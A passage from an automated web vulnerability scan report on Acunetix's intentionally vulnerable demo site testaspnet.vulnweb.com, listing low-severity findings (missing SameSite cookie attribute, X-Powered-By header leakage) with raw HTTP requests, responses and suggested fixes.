          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          ASP.NET_SessionId
          Evidence
          Set-Cookie: ASP.NET_SessionId
          Solution

          Ensure that the SameSite attribute is set to either 'lax' or ideally 'strict' for all cookies.

      2. Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s) (38)
        1. GET http://testaspnet.vulnweb.com
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (211 bytes)
          GET http://testaspnet.vulnweb.com HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        2. GET http://testaspnet.vulnweb.com/
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (212 bytes)
          GET http://testaspnet.vulnweb.com/ HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:15 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" 